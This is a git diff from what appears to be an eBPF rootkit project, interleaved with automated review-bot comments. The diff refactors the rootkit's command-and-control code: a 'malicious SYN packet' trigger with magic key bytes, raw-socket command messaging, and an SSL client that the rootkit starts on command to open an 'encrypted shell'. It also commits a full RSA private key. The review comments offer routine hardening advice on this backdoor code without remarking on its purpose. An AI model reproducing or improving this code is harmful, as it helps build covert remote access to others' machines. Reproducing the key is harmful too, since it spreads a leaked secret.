diff --git a/src/.output/kit.o b/src/.output/kit.o index e23138d..74c91c6 100644 Binary files a/src/.output/kit.o and b/src/.output/kit.o differ diff --git a/src/bin/kit b/src/bin/kit index 914824e..d5ab35b 100755 Binary files a/src/bin/kit and b/src/bin/kit differ diff --git a/src/client/client.c b/src/client/client.c index 0626e55..c7547d1 100644 --- a/src/client/client.c +++ b/src/client/client.c @@ -12,7 +12,6 @@ #include "../common/constants.h" #include "../common/c&c.h" -#include "../common/protocol.h" #include "include/sslserver.h" // For printing with colors @@ -195,7 +194,7 @@ void activate_command_control_shell_encrypted(char* argv){ check_ip_address_format(argv); printf("["KBLU"INFO"RESET"]""Crafting malicious SYN packet...\n"); //+1 since payload must finish with null character for parameter passing, although not sent in the actual packet payload - char payload[CC_TRIGGER_SYN_PACKET_PAYLOAD_SIZE+1]; + char payload[CC_TRIGGER_SYN_PACKET_PAYLOAD_SIZE+1] = {0}; srand(time(NULL)); for(int ii=0; ii:"RESET""); - fgets(buf, BUFSIZ, stdin); - if ((strlen(buf)>0) && (buf[strlen(buf)-1] == '\n')){ - buf[strlen(buf)-1] = '\0'; - } - - char msg[BUFSIZ]; - strcpy(msg, CC_PROT_MSG); - strcat(msg, buf); - packet = build_standard_packet(8000, 9000, local_ip, argv, 4096, msg); - printf("Sending %s\n", msg); - if(rawsocket_send(packet)<0){ - printf("["KRED"ERROR"RESET"]""An error occured. Aborting...\n"); - return; - } - printf("["KBLU"INFO"RESET"]""Waiting for rootkit response...\n"); - packet = rawsocket_sniff_pattern(CC_PROT_MSG); - char* res = packet.payload; - printf("["KGRN"RESPONSE"RESET"] %s\n", res); - } + } diff --git a/src/client/client.o b/src/client/client.o index b962b63..2672517 100644 Binary files a/src/client/client.o and b/src/client/client.o differ diff --git a/src/client/include/sslserver.h b/src/client/include/sslserver.h index 0b65942..60dd944 100644 --- a/src/client/include/sslserver.h +++ b/src/client/include/sslserver.h 
@@ -1,7 +1,5 @@
 // This code is based from the following tutorial:
 // https://aticleworld.com/ssl-server-client-using-openssl-in-c/
-// gcc -Wall -o server server.c -L/usr/lib -lssl -lcrypto
-// sudo ./server
 #include "openssl/err.h"
 #include "openssl/ssl.h"
@@ -19,19 +17,6 @@
 #define USE_FUNCTIONS 0
-void instructionsForPem(void) {
- printf("\n");
- printf("\n");
- printf("Did you forget to create your mycert.pem file?\n");
- printf("\n");
- printf("Run: openssl req -x509 -nodes -days 365 -newkey rsa:1024 -keyout " "mycert.pem -out mycert.pem\n");
- printf("\n");
- printf("If you haven't, but that's my best guess of what has gone wrong..\n");
- printf("\n");
- printf("\n");
-}
-
 #if (USE_FUNCTIONS)
 SSL_CTX *InitServerCTX(void) {
 const SSL_METHOD *method;
@@ -155,28 +140,20 @@ void Servlet(SSL *ssl) {
 }
 #endif
-int server_run(int argc, char **argv) {
+int server_run(int port) {
 SSL_CTX *ctx;
 int server;
- int portnum;
 const char *szPemPublic = "mycert.pem";
 const char *szPemPrivate = "mycert.pem";
 #if (!(USE_FUNCTIONS))
 const SSL_METHOD *method;
 #endif
- if (argc != 2) {
- printf("Usage: %s \n", argv[0]);
- exit(0);
- }
-
- portnum = atoi(argv[1]);
-
- if (portnum < 1024) {
+ if (port < 1024) {
 if (getuid() != 0) {
 printf("This program must be run as root/sudo user since your port # " "(%d) is < 1024\n",
- portnum);
+ port);
 exit(1);
 }
 }
@@ -203,14 +180,12 @@ int server_run(int argc, char **argv) {
 /* set the local certificate from CertFile */
 if (SSL_CTX_use_certificate_file(ctx, szPemPublic, SSL_FILETYPE_PEM) <= 0) {
 ERR_print_errors_fp(stderr);
- instructionsForPem();
 abort();
 }
 /* set the private key from KeyFile (may be the same as CertFile) */
 if (SSL_CTX_use_PrivateKey_file(ctx, szPemPrivate, SSL_FILETYPE_PEM) <= 0) {
 ERR_print_errors_fp(stderr);
- instructionsForPem();
 abort();
 }
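Review bot: `server_run(int port)` now takes a plain `int` from its caller, but the only validation kept in the hunk at -155 is `if (port < 1024)`; a negative value or one above 65535 is accepted and later truncated by `htons(port)`, so the server silently binds a different port than requested. Add a range check next to the privilege check, `if (port < 1 || port > 65535) { printf("invalid port %d\n", port); exit(1); }`, or take `uint16_t` as `client_run` in ssl_client.h does. Separately, this header defines non-static functions (`server_run`, and `InitServerCTX` under `USE_FUNCTIONS`), so including it from a second translation unit produces duplicate-symbol link errors; the definitions belong in a `.c` file with only prototypes here. server_run's body continues outside the hunk.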
@@ -229,7 +204,7 @@ int server_run(int argc, char **argv) {
 server = socket(PF_INET, SOCK_STREAM, 0);
 bzero(&addr, sizeof(addr));
 addr.sin_family = AF_INET;
- addr.sin_port = htons(portnum);
+ addr.sin_port = htons(port);
 addr.sin_addr.s_addr = INADDR_ANY;
 if (bind(server, (struct sockaddr *)&addr, sizeof(addr)) != 0) {
 perror("can't bind port");
@@ -252,7 +227,7 @@ int server_run(int argc, char **argv) {
 // this is my attempt to run HTTPS.. This is sort of the minimal header that
 // seems to work. \r is absolutely necessary.
- const char *szHttpServerResponse =
+ const char *response =
 "HTTP/1.1 200 OK\r\n"
 "Content-type: text/html\r\n"
 "\r\n"
@@ -266,7 +241,7 @@ int server_run(int argc, char **argv) {
 "\n";
 #endif
 int client;
-
+ printf("Listening for connections\n");
 client = accept(server, (struct sockaddr *)&addr, &len); /* accept connection as usual */
 printf("Connection: %s:%d\n", inet_ntoa(addr.sin_addr),
@@ -305,8 +280,8 @@ int server_run(int argc, char **argv) {
 printf("Client msg:\n[%s]\n", buf);
 if (bytes > 0) {
- printf("Reply with:\n[%s]\n", szHttpServerResponse);
- SSL_write(ssl, szHttpServerResponse, strlen(szHttpServerResponse));
+ printf("Reply with:\n[%s]\n", response);
+ SSL_write(ssl, response, strlen(response));
 } else {
 ERR_print_errors_fp(stderr);
 }
diff --git a/src/client/injector b/src/client/injector
index a818041..26bff40 100755
Binary files a/src/client/injector and b/src/client/injector differ
diff --git a/src/client/mycert.pem b/src/client/mycert.pem
new file mode 100644
index 0000000..9b7c11d
--- /dev/null
+++ b/src/client/mycert.pem
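Review bot: The `socket()` result at the top of the hunk at -229 is stored in `server` and passed straight to `bind()` without a check for -1, and `SSL_write(ssl, response, strlen(response))` in the hunk at -305 discards its return value, so a failed or short write goes unnoticed while the log still reports the reply as sent. Check the descriptor before use, `if (server < 0) { perror("socket"); exit(1); }`, and test the write result, `if (SSL_write(ssl, response, strlen(response)) <= 0) ERR_print_errors_fp(stderr);`. server_run starts and ends outside these hunks.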
@@ -0,0 +1,81 @@ +-----BEGIN PRIVATE KEY----- +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 +A/iGISWr4/qHcINgtY1nBHeCd0EkOQ== +-----END PRIVATE KEY----- +-----BEGIN CERTIFICATE----- +MIIE+zCCAuOgAwIBAgIURgo+OnvjsvSRONRpscRzizvP+QUwDQYJKoZIhvcNAQEL +BQAwDTELMAkGA1UEBhMCRVMwHhcNMjIwNTA2MDEwMzM4WhcNMjMwNTA2MDEwMzM4 +WjANMQswCQYDVQQGEwJFUzCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIB +AKpElD4Wn11yE15GMDf97qhy5MYN2X0oAiXSE/epBhc6KSsnJjQhD0WvgdP9n6GM +zX9EUXN1r6sg4iHoWL1dBaYhKA2Qsgjx7r8XYHyyCrl4m4ps/5dr8kZsaLB4M5r9 +LhQSb8mZubjQO2CvTwYIBisKLfmPg4AcDsBOj0C+lKBrnCRGwpy6YuWcll0UvOtd +Zy5psvK/pNUatViYkg/KRn5dObQSgUPlPlDj2jVCaH8HUgh4T+E/hHsvOgrgpzm4 +SVLqFS0sgewegrUvjNUCo/7JvcQrQeXD4mCZ0wt26U4fFf6GnF2q1NES5fBa9LEK 
+po3UwgpAsOJFfdCi+fXpqcoNLxecL0PBrojN1yBdm2VM0YTTKBtQe/iwtcXQkkkd +SxWtCEE86Mwi7zQhZJgq67B/gGdvuZ8nKP5/oVqc4al9JCPTqHhpZqI/w9QrfyK9 +QZ8XSA8NsrTVD/GqpxpWqF6jkoT9hRWSzfFJpMsx4r2+KzeLn89j4YsvrjgrVz76 +zyxIIWA6P2ANMvLgFa71XYeQK1PZkkYbriC9wtjP7ljmDwVbLEwWyBCtCw/I/ATP +S9/d12lS8C6vXOvfn99jCN0vuXQywHJIkOtUh0q1fTDHyDbig4UzS/kpm6QKmzqb +vtzaZr0kHTfVGhrCegXjQlOcZ07XjFRMD215OBccNKKJAgMBAAGjUzBRMB0GA1Ud +DgQWBBQfgD7ZU0HjCQlRmuThMlRYnAkb/TAfBgNVHSMEGDAWgBQfgD7ZU0HjCQlR +muThMlRYnAkb/TAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBCwUAA4ICAQBC +VzY9Q7YXIGQRv1hw2uzpv15mQJHGIPh1YyRJMQIaAPAfvLy5Mi+IY+ZMvCfVlykD +NTxoPLiJQvwf61UOPyxOHA/TUXdLybeqiFCM025PHx/H8K482WBORPOuOFep2xf1 +A4MEFyX3aeBAEFcR0/ns2evQt4KIjmglHxmCPCTA29/6P+ObS0BtUngyFKyoCS9Z +10EakCZsC65ALV7/qU4jPrvQYU0xMSnAop+pwAFtUvKzlfrPNuCNw3jSR3yX2pZj +/Pkhjub7dlIAR+A2iwktAnv8s4U/QbOia/hfu3hDgXK5yvynfjBAHcFZ6nmZFlUH +9DyTaYObWG5s3Hz3gD4hbO4m4e4mnFqwK+Q5oNBnR0Sjw/6snowKf5rq78SJ2w0w +buoXThpknQFpvHfFnWmxcynqUp4LFWmXcK4OEkl85iwmhu/8R7rRt3K3NgrH9U18 +lya7XySsKL7tCH94B1sG81SK8l503Vs+7o37pGiehd00mj5YBuR5VqFh1QgrZQmp +wHrqLodvegwuRxpUuwrI+3IvLYB5f3n5i9uL2/n5b6Y97aTyrXijoTdmZEn68OE1 +exrEy4SJhZXu2DFkFIjFYISw73hwsXBrr54RX34Y4y5NYb7G0IXLMdiLaKzCChAC +gESIACorO+q0WCekd1dT+OyxdyzScFXMkgeu0P0Fmw== +-----END CERTIFICATE----- diff --git a/src/common/c&c.h b/src/common/c&c.h index c4893c7..bc81f4c 100644 --- a/src/common/c&c.h +++ b/src/common/c&c.h 
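Review bot: `src/client/mycert.pem` adds an RSA private key together with its certificate to version control, and `server_run` in sslserver.h loads it by the relative name both `szPemPublic` and `szPemPrivate` point at, `"mycert.pem"`, so the file is resolved against whatever the working directory happens to be. Anything committed stays in the repository history, so this key should be treated as disclosed and regenerated, the file removed and listed in `.gitignore`, and the path passed in or configured rather than hard-coded. The same commit also tracks rebuilt binaries (`src/.output/kit.o`, `src/bin/kit`, `src/client/client.o`, `src/client/injector`), which cannot be reviewed and will drift from the sources; build outputs belong in the ignore list as well.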
@@ -1,22 +1,31 @@
 #ifndef __BPF_CC_H
 #define __BPF_CC_H
-#include "protocol.h"
-
+//C&C V0
 #define CC_PROT_SYN "CC_SYN"
 #define CC_PROT_ACK "CC_ACK"
 #define CC_PROT_MSG "CC_MSG#"
 #define CC_PROT_FIN_PART "CC_FIN"
 #define CC_PROT_FIN CC_PROT_MSG CC_PROT_FIN_PART
-//C&C V1 -- bpv47-like trigger
+//C&C V1 -- bpv47-like trigger + encrypted shell
 #define CC_TRIGGER_SYN_PACKET_PAYLOAD_SIZE 0x10
 #define CC_TRIGGER_SYN_PACKET_KEY_1 "\x56\xA4"
 #define CC_TRIGGER_SYN_PACKET_KEY_2 "\x78\x13"
 #define CC_TRIGGER_SYN_PACKET_KEY_3_ENCRYPTED_SHELL "\x1F\x29"
-
 #define CC_TRIGGER_SYN_PACKET_SECTION_LEN 0x02
+#define CC_PROT_COMMAND_ENCRYPTED_SHELL 0
+
+//C&C V2 -- Distributed hidden payload in packet stream
+struct trigger_t {
+ unsigned char xor_key;
+ unsigned int ip;
+ short unsigned int port;
+ unsigned char pad1;
+ short unsigned int pad2;
+ short unsigned int crc;
+};
 #endif
\ No newline at end of file
diff --git a/src/common/protocol.h b/src/common/protocol.h
deleted file mode 100644
index 466e4b3..0000000
--- a/src/common/protocol.h
+++ /dev/null
@@ -1,19 +0,0 @@
-#ifndef __PROTOCOL_H
-#define __PROTOCOL_H
-
-//V1
-#define CC_PROT_COMMAND_ENCRYPTED_SHELL 0
-
-//V2
-struct trigger_t {
- unsigned char xor_key;
- unsigned int ip;
- short unsigned int port;
- unsigned char pad1;
- short unsigned int pad2;
- short unsigned int crc;
-};
-
-
-
-#endif
\ No newline at end of file
diff --git a/src/user/include/utils/network/ssl_client.h b/src/user/include/utils/network/ssl_client.h
index 2265269..97f7d1c 100644
--- a/src/user/include/utils/network/ssl_client.h
+++ b/src/user/include/utils/network/ssl_client.h
@@ -1,7 +1,5 @@
-// This is based from:
-// --------------------
+// This is based from the following tutorial:
 // https://aticleworld.com/ssl-server-client-using-openssl-in-c/
-// gcc -Wall -o client client.c -L/usr/lib -lssl -lcrypto
 #include
 #include
 #include
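Review bot: The include guard `__BPF_CC_H` kept at the top of the c&c.h hunk (like the `__PROTOCOL_H` guard this commit deletes) starts with a double underscore, an identifier form C reserves for the implementation, so it can collide with compiler or libc headers; a project-prefixed name such as `CC_H` avoids that, `#ifndef CC_H` / `#define CC_H`. The header also still ends without a trailing newline, as the `\ No newline at end of file` marker shows, which some preprocessors warn about and which makes every future append show up as a change to the `#endif` line.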
@@ -81,31 +79,21 @@ void ShowCerts(SSL *ssl) {
 }
 #endif
-int clientrun(int argc, char **argv) {
+int client_run(char* hostname, uint16_t portnum) {
 SSL_CTX *ctx;
 int server;
 SSL *ssl;
 static char buf[1024 * 1024];
 int bytes;
- char *hostname;
- uint16_t portnum;
 #if (!(USE_FUNCTIONS))
 struct hostent *host;
 struct sockaddr_in addr;
 const SSL_METHOD *method;
 #endif
- if (argc != 3) {
- printf("usage: %s \n", argv[0]);
- exit(0);
- }
-
 // Initialize the SSL library
 SSL_library_init();
- hostname = argv[1];
- portnum = atoi(argv[2]);
-
 #if (USE_FUNCTIONS)
 ctx = InitCTX();
 server = OpenConnection(hostname, portnum);
@@ -148,8 +136,8 @@ int clientrun(int argc, char **argv) {
 X509 *cert;
 char *line;
 #endif
- char szRequest[4096];
- sprintf(szRequest,
+ char request[4096];
+ sprintf(request,
 "GET / HTTP/1.1\r\n"
 "User-Agent: Wget/1.17.1 (linux-gnu)\r\n"
 "Accept: */*\r\n"
@@ -159,7 +147,7 @@ int clientrun(int argc, char **argv) {
 "\r\n", hostname, portnum);
- printf("Sending:\n[%s]\n", szRequest);
+ printf("Sending:\n[%s]\n", request);
 printf("\n\nConnected with %s encryption\n", SSL_get_cipher(ssl));
@@ -181,7 +169,7 @@ int clientrun(int argc, char **argv) {
 }
 #endif
- SSL_write(ssl, szRequest, strlen(szRequest)); /* encrypt & send message */
+ SSL_write(ssl, request, strlen(request)); /* encrypt & send message */
 bytes = SSL_read(ssl, buf, sizeof(buf)); /* get reply & decrypt */
 buf[bytes] = 0;
diff --git a/src/user/kit.c b/src/user/kit.c
index 847e162..7facc6a 100644
--- a/src/user/kit.c
+++ b/src/user/kit.c
@@ -109,8 +109,9 @@ static int handle_rb_event(void *ctx, void *data, size_t data_size){
 printf("%s COMMAND pid:%d code:%i\n", ts, e->pid, e->code);
 switch(e->code){
 case CC_PROT_COMMAND_ENCRYPTED_SHELL:
+ //TODO EXTRACT IP FROM KERNEL BUFFER
 printf("Starting encrypted connection\n");
-
+ client_run("127.0.1.1", 8500);
 break;
 default:
 printf("Command received unknown: %d\n", e->code);
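Review bot: `sprintf(request, "GET / HTTP/1.1\r\n" …, hostname, portnum)` in the hunk at -148 formats the caller-supplied `hostname` into the fixed `request[4096]` with no bound, and now that `hostname` arrives as a parameter rather than `argv`, nothing upstream limits its length; use `snprintf(request, sizeof request, …)` and refuse to send when the result is negative or `>= sizeof request`. In the hunk at -181, `buf[bytes] = 0` after `SSL_read(ssl, buf, sizeof(buf))` writes one past the array when the read fills it and indexes before it when `SSL_read` returns a negative error, so read at most `sizeof(buf) - 1` and clamp first: `bytes = SSL_read(ssl, buf, sizeof(buf) - 1);` / `if (bytes < 0) bytes = 0;` / `buf[bytes] = 0;`. The `SSL_write` return on the preceding line is discarded as well. client_run starts and ends outside these hunks.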